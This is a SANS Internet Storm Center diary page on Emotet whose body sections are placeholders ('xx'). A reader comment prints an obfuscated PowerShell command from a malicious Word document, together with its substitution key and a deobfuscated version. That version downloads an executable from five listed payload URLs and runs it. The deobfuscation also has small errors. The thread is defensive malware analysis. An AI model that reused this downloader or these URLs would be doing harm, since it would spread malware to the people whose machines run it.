Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Emotet infections and follow-up malware - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Emotet infections and follow-up malware

Introduction

xx

The malspam

xx

The traffic

xx

The malware

xx

Indicators of Compromise (IoCs)

xx

Final words

Pcaps of the infection traffic and malware associated with today's diary can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

Brad

340 Posts
ISC Handler
Document http://ciblage-spain[.]es/Transactions/01_19/ contained the following concatenated powershell string observed over two separate strings. (Analyzed with Didier's numbers-to-strings.py)

sEt sx=pow^%PdoB;IC:~5?1^%r^%SESSIOAZAZAME:~-4?1^%(^%TEMP:~-3?1^%ll $ConcreUIelj='SpA;ju'6$Border)dl=new-o`jecUI AZeUI.We`ClienUI6$PCIrd='(UIUIp://r[dinUIr[der.com/AZAOvd1X@(UIUIp://mypuppy)iUIUIer.com/Wcdo9i4Yd`H@(UIUIp://demo).UIec(noex[m.com/e(]w1`mlo@(UIUIp://UIimgi[mgi[.)iUIe/P7p4eo54pAB@(UIUIp://g[ropin-r-01.com/[dodof1TK('.SpliUI#'@'_6$UIurnkeyji='9[UI[iw'6$AZ[UIion[l[z = '882'6$SUIreeUIpv='gold[f'6$S[ving)AccounUIUIo=$env:pu`lic+'\'+$AZ[UIion[l[z+'.exe'6fore[c(#$p[ymenUI)) in $PCIrd_{UIry{$Border)dl.9ownlo[d,ile#$p[ymenUI))? $S[ving)AccounUIUIo_6$9irecUIorpp='B[`yMovie)wf'6If ##GeUI-IUIem $S[ving)AccounUIUIo_.lengUI( -ge 80000_ {Invoke-IUIem $S[ving)AccounUIUIo6$redund[nUIqj='invoicez)'6`re[k6}}c[UIc({}}$]u``err`='invoiced`'6&& SEt cU=!sx:pA=Q!&&set Qedo=!cU:AZ=N!&& SEt yA=!Qedo:UI=t!& seT pw=!yA:do=U!&& SET Oqb=!pw:(=h!& SEt Q4aC=!Oqb:#=(!&& SeT R64=!Q4aC:)=s!& SET Yo=!R64:`=b!&SEt hxfQ=!Yo:[=a!&& seT Xtk=!hxfQ:;=L!& sEt hYF=!Xtk:9=D!&& SEt yb=!hYF:_=)!&& sET xk=!yb:6=;!&& SeT CnA=!xk:]=R!& sEt 1JS=!CnA:,=F!& Set h1Z3=!1JS:?=,!&& eChO %h1Z3% |%ComMOnproGRaMFILeS(X86):~23,-11%%CommonPrOGRamFiLes:~9,1%%tEmp:~-15,-14%

This sample is employing substitution.
--------
Substitution Key

# = (
AZ = N
pA = Q
[ = a
) = s
( = h
UI = t
; = l
] = R
? = ,
6 = ;
, = F
` = b
_ = )
9 = D
? = ,
] = r
do = U

-Substitution applied-

set sx=pow%PuBLIC:~5F1%r%SESSIONNAME:~-4F1%h%TEMP:~-3F1%ll $Concretelj='SQLju';$Bordersdl=new-object Net.WebClient;$PCIrd='http://radintrader.com/NAOvd1X@http://mypuppysitter.com/WcuDi4YdbH@http://demos.technoexam.com/ehrw1bmlo@http://timgiamgia.site/P7p4eo54QB@http://garopin-r-01.com/auuf1TKh'.Split('@');$turnkeyji='Dataiw';$NationalN = '882';$Streetpv='goldaf';$SavingsAccountto=$env:public+'\'+$NationalN+'.exe';foreach($Payments) in $PCIrd){try{$Bordersdl.uwnloadFile($Payments)F $SavingsAccountto);$Directorpp='BabyMovieswf';If ((Get-Item $SavingsAccountto).length -ge 80000) {Invoke-Item $SavingsAccountto;$redundantqj='invoicezs';break;}}catch{}}$rubberrb='invoicedb';

-URL's-

http://radintrader[.]com/NAOvd1X
http://mypuppysitter[.]com/WcdoDi4YdbH
http://demos.technoexam[.]com/ehrw1bmlo
http://timgiamgia[.]site/P7p4eo54QB
http://garopin-r-01[.]com/auuf1TKh

Does anyone have an easier way of extracting the URL's?
Vince

2 Posts
Quoting Vince:Does anyone have an easier way of extracting the URL's?


Submit the downloaded Word document to app.any.run and use the "fakenet" option. That causes the document to attempt all of the URLs for the Emotet malware binary.
Brad

340 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!